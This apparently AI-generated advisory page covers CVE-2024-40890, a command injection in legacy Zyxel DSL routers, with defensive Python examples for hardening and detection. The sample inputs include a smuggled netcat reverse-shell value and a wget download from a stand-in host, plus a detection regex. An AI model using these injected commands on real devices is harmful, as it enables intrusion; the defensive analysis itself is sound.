CVE-2024-40890 Overview
CVE-2024-40890 is a post-authentication command injection vulnerability in legacy Zyxel DSL Customer Premises Equipment (CPE) devices. The flaw resides in the Common Gateway Interface (CGI) program of firmware version 1.00(AAFR.4)C0_20170615 on the Zyxel VMG4325-B10A and related legacy models. An authenticated attacker can send a crafted HTTP POST request to execute arbitrary operating system commands on the affected device. The vulnerability is classified under CWE-78 (Improper Neutralization of Special Elements used in an OS Command). Zyxel had already declared the affected products end-of-life when the CVE was assigned, so no security patches will be issued. CISA added this vulnerability to its Known Exploited Vulnerabilities catalog, confirming active in-the-wild exploitation.
Critical Impact
Authenticated attackers can achieve full operating system command execution on end-of-life Zyxel DSL CPE devices. CISA confirms active exploitation, and no vendor patch is available.
Affected Products
- Zyxel VMG series: VMG1312-B10A/B10B/B10E, VMG3312-B10A, VMG3313-B10A, VMG3926-B10B, VMG4325-B10A, VMG4380-B10A, VMG8324-B10A, VMG8924-B10A
- Zyxel SBG series: SBG3300-N000, SBG3300-NB00, SBG3500-N000, SBG3500-NB00
- Affected firmware version: 1.00(AAFR.4)C0_20170615 and related legacy DSL CPE builds
Discovery Timeline
- 2025-02-04 - Zyxel publishes security advisory for legacy DSL CPE command injection
- 2025-02-04 - CVE-2024-40890 published to NVD
- 2025-10-27 - Last updated in NVD database
- CISA KEV - Added to CISA Known Exploited Vulnerabilities catalog
Technical Details for CVE-2024-40890
Vulnerability Analysis
The vulnerability is an OS command injection flaw in a CGI handler within the Zyxel device web management interface. The CGI program processes HTTP POST request parameters and passes attacker-influenced values to an underlying shell or system call without proper input sanitization. By embedding shell metacharacters such as ;, |, `, or $() within crafted POST body fields, an authenticated attacker can break out of the intended command context and execute arbitrary commands as the privileged service account running the CGI.
Because the vulnerable code path executes after authentication, exploitation requires valid credentials. In practice that barrier is low: the affected models are widely deployed and frequently retain default or weak administrator passwords, and the same Zyxel advisory also reports insecure default credentials in this legacy CPE line, so an attacker can chain a default-credential login with the command injection.
Root Cause
The root cause is improper neutralization of special elements in input passed to OS command interpreters [CWE-78]. The CGI binary concatenates HTTP POST parameter values directly into system command strings invoked through functions such as system(), popen(), or shell-spawning wrappers, with no allowlist, escaping, or argument-array execution.
Attack Vector
An attacker authenticates to the device web interface over HTTP or HTTPS and submits a POST request to the vulnerable CGI endpoint. Parameter values are crafted to contain shell separator characters followed by attacker-supplied commands. The CGI passes the unsanitized string to the OS shell, which interprets and executes the injected payload with the privileges of the web management daemon, typically root on embedded Linux-based CPE firmware. Successful exploitation enables arbitrary file read and write, persistence installation, traffic interception, lateral movement into the internal network, and recruitment of the device into botnets. Refer to the Zyxel Security Advisory for full technical context.
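To make the root cause concrete, the following is an added Python illustration (not Zyxel's code and not taken from the advisory) of the vulnerable string-concatenation pattern beside a hardened argument-array version. The `host` parameter and the `ping` diagnostic are assumptions chosen for illustration; the page does not identify the real CGI endpoint or parameter.

```python
"""CWE-78 pattern behind CVE-2024-40890, shown in Python rather than the device's
native CGI. Added example, not Zyxel's code: the 'host' parameter and the 'ping'
diagnostic are assumptions chosen to illustrate the pattern; the page does not
identify the real endpoint or parameter."""
import re
import shlex
import subprocess

# Constructed POST values (not captured traffic). The second one ends the ping
# with ';' and appends an attacker command.
BENIGN_HOST = "192.0.2.10"
INJECTED_HOST = "192.0.2.10; nc 203.0.113.5 4444 -e /bin/sh"


def build_command_vulnerable(host: str) -> str:
    """Vulnerable pattern: the POST value is concatenated into a shell command
    string. On the device this string would be handed to system()/popen(), and
    the shell treats everything after ';' as a second command."""
    return "ping -c 3 " + host


def shell_would_split(command: str) -> list:
    """Tokenise the string the way a POSIX shell would, keeping ';', '|', '&'
    as separate tokens, so the injected statement becomes visible."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    return list(lexer)


# Allowlist for the value: hostname/IPv4 characters only, no shell metacharacters.
HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def build_command_hardened(host: str) -> list:
    """Hardened form: validate against an allowlist, then build an argv list so
    the value is passed as one argument and never parsed by a shell. '--' stops
    a value beginning with '-' from being read as a ping option."""
    if not HOST_RE.fullmatch(host):
        raise ValueError("rejected host parameter: %r" % host)
    return ["ping", "-c", "3", "--", host]


def run_diagnostic(host: str) -> subprocess.CompletedProcess:
    """Execute the hardened command without a shell (a list argv means
    shell=False). Not exercised by the tests; requires a ping binary."""
    return subprocess.run(build_command_hardened(host),
                          capture_output=True, text=True, check=False)


if __name__ == "__main__":
    print(shell_would_split(build_command_vulnerable(INJECTED_HOST)))
    try:
        build_command_hardened(INJECTED_HOST)
    except ValueError as exc:
        print("hardened:", exc)
```

The hardened version relies on two independent controls: the allowlist rejects the value before any command is built, and the argv form means that even a value which slipped past validation would reach `ping` as a single argument rather than being parsed by a shell.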
Detection Methods for CVE-2024-40890
Indicators of Compromise
- HTTP POST requests to CGI endpoints on the device management interface containing shell metacharacters (;, |, &, `, $()) in parameter values
- Unexpected outbound connections from the CPE device to unknown command-and-control infrastructure
- New or modified files in writable firmware locations and unrecognized processes spawned by the web server daemon
- Authentication events using default or factory credentials immediately followed by POST traffic to management CGIs
Detection Strategies
- Inspect web server and CGI access logs on affected devices for POST requests containing URL-encoded shell metacharacters; because access logs rarely record POST bodies, a reverse proxy, WAF or packet capture in front of the device is usually needed to see the parameter values
- Deploy network intrusion detection signatures that flag command injection patterns targeting Zyxel CGI URIs
- Correlate successful management-plane logins with subsequent anomalous DNS lookups or outbound connections from the device
- Baseline expected CPE behavior and alert on deviations such as new listening ports, shell processes, or cron entries
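The log inspection and login-to-POST correlation strategies above, as an added example (not from the page and not Zyxel's tooling) run over constructed HTTP requests. The CGI paths `/cgi-bin/login.cgi` and `/cgi-bin/diag.cgi`, the parameter names and all addresses are assumptions; the requests are meant to come from a packet capture or reverse proxy in front of the device.

```python
"""Detection logic for CVE-2024-40890-style command injection, run over
constructed sample HTTP requests to a CPE management interface. Added example,
not from the page and not Zyxel's: the paths /cgi-bin/login.cgi and
/cgi-bin/diag.cgi, the parameter names and all traffic are invented for
illustration."""
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Shell separators and substitution openers worth flagging in a CGI parameter value.
SHELL_META_RE = re.compile(r"[;|&`\n]|\$\(")
LOGIN_PATH = "/cgi-bin/login.cgi"     # assumed login endpoint
EXTRA_DECODE_ROUNDS = 1               # parse_qsl decodes once; this catches %253B etc.


def parse_http_request(raw: bytes) -> dict:
    """Minimal HTTP/1.1 request parser: request line, headers, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers,
            "body": body.decode("latin-1")}


def extract_params(req: dict) -> list:
    """Query-string parameters plus form-encoded POST body parameters."""
    params = parse_qsl(urlsplit(req["target"]).query, keep_blank_values=True)
    ctype = req["headers"].get("content-type", "")
    if req["method"] == "POST" and ctype.startswith("application/x-www-form-urlencoded"):
        params += parse_qsl(req["body"], keep_blank_values=True)
    return params


def suspicious_params(req: dict) -> list:
    """Return (name, decoded_value, metachar) for each parameter whose value
    contains a shell metacharacter after repeated URL-decoding."""
    hits = []
    for name, value in extract_params(req):
        decoded = value
        for _ in range(EXTRA_DECODE_ROUNDS):
            decoded = unquote_plus(decoded)
        match = SHELL_META_RE.search(decoded)
        if match:
            hits.append((name, decoded, match.group(0)))
    return hits


def is_cgi_path(path: str) -> bool:
    return path.startswith("/cgi-bin/") or path.endswith(".cgi")


def scan_traffic(events: list, window: timedelta = timedelta(seconds=120)) -> list:
    """events: (timestamp, src_ip, raw_request) tuples. Flags POSTs to CGI paths
    carrying shell metacharacters and records whether the same source logged in
    shortly before (the default-credential-then-inject pattern)."""
    alerts = []
    last_login = {}
    for ts, src, raw in sorted(events, key=lambda e: e[0]):
        req = parse_http_request(raw)
        path = urlsplit(req["target"]).path
        if req["method"] == "POST" and path == LOGIN_PATH:
            last_login[src] = ts
            continue
        if req["method"] != "POST" or not is_cgi_path(path):
            continue
        hits = suspicious_params(req)
        if not hits:
            continue
        login_ts = last_login.get(src)
        alerts.append({
            "time": ts, "src": src, "target": req["target"], "params": hits,
            "recent_login": login_ts is not None and ts - login_ts <= window,
        })
    return alerts


def _form_post(path: str, body: str) -> bytes:
    return (f"POST {path} HTTP/1.1\r\nHost: 192.0.2.1\r\n"
            f"Content-Type: application/x-www-form-urlencoded\r\n\r\n{body}").encode()


# Constructed sample traffic (not a real capture).
SAMPLE_TRAFFIC = [
    (datetime(2025, 2, 5, 3, 14, 7), "198.51.100.23",
     _form_post("/cgi-bin/login.cgi", "username=admin&password=1234")),
    (datetime(2025, 2, 5, 3, 14, 12), "198.51.100.23",
     _form_post("/cgi-bin/diag.cgi",
                "action=ping&host=192.0.2.10%3Bwget+http%3A%2F%2F203.0.113.5%2Fx+-O+%2Ftmp%2Fx")),
    (datetime(2025, 2, 5, 3, 20, 0), "192.0.2.50",
     _form_post("/cgi-bin/diag.cgi", "action=ping&host=192.0.2.10")),        # benign
    (datetime(2025, 2, 5, 3, 25, 0), "198.51.100.77",
     _form_post("/cgi-bin/diag.cgi", "action=ping&host=192.0.2.10%253Bid")),  # double-encoded ';'
]


if __name__ == "__main__":
    for alert in scan_traffic(SAMPLE_TRAFFIC):
        print(alert)
```

Running it on the sample traffic yields two alerts: the injection that follows a login from the same address within the window, and a double-encoded attempt from an address with no preceding login. The extra decode round matters because a single-pass signature would see `%3B` rather than `;` in the second case.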
Monitoring Recommendations
- Forward CPE syslog and firewall logs to a centralized analytics platform for retention and correlation
- Monitor for ingress traffic from the WAN to the device HTTP/HTTPS management interface, which should generally be disabled
- Alert on any administrative authentication from non-corporate or geo-anomalous source addresses
- Track CISA KEV catalog updates to maintain awareness of active exploitation campaigns targeting these models
How to Mitigate CVE-2024-40890
Immediate Actions Required
- Identify and inventory all legacy Zyxel DSL CPE devices listed in the affected products section across the environment
- Disable WAN-side access to the device web management interface and restrict LAN management to a dedicated administrative VLAN
- Replace default and weak administrator credentials with strong, unique passwords on every affected device
- Plan and execute replacement of end-of-life Zyxel CPE hardware with currently supported models that receive security updates
Patch Information
No patch is available. Zyxel has confirmed that the affected legacy DSL CPE models are unsupported and will not receive a fix. The vendor advisory recommends replacement with supported equipment. See the Zyxel Security Advisory and the CISA Known Exploited Vulnerabilities Catalog entry for authoritative guidance.
Workarounds
- Block inbound TCP 80 and 443 to the device WAN interface using upstream firewall rules until replacement is complete
- Place affected CPE devices behind a network segmentation boundary that prevents pivoting into corporate or operational networks
- Disable remote management features and any UPnP or TR-069 services that expose management functionality externally
- Rotate all administrative credentials and audit account lists to remove unused or vendor-default accounts
# Example: block inbound management access to legacy CPE from an upstream firewall that routes to it
# <CPE_WAN_IP> is a placeholder; -I inserts at the top of FORWARD so an earlier ACCEPT rule cannot bypass the drop
iptables -I FORWARD -p tcp -d <CPE_WAN_IP> --dport 80 -j DROP    # HTTP management interface
iptables -I FORWARD -p tcp -d <CPE_WAN_IP> --dport 443 -j DROP   # HTTPS management interface
iptables -I FORWARD -p tcp -d <CPE_WAN_IP> --dport 7547 -j DROP  # TR-069 (CWMP) remote management
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


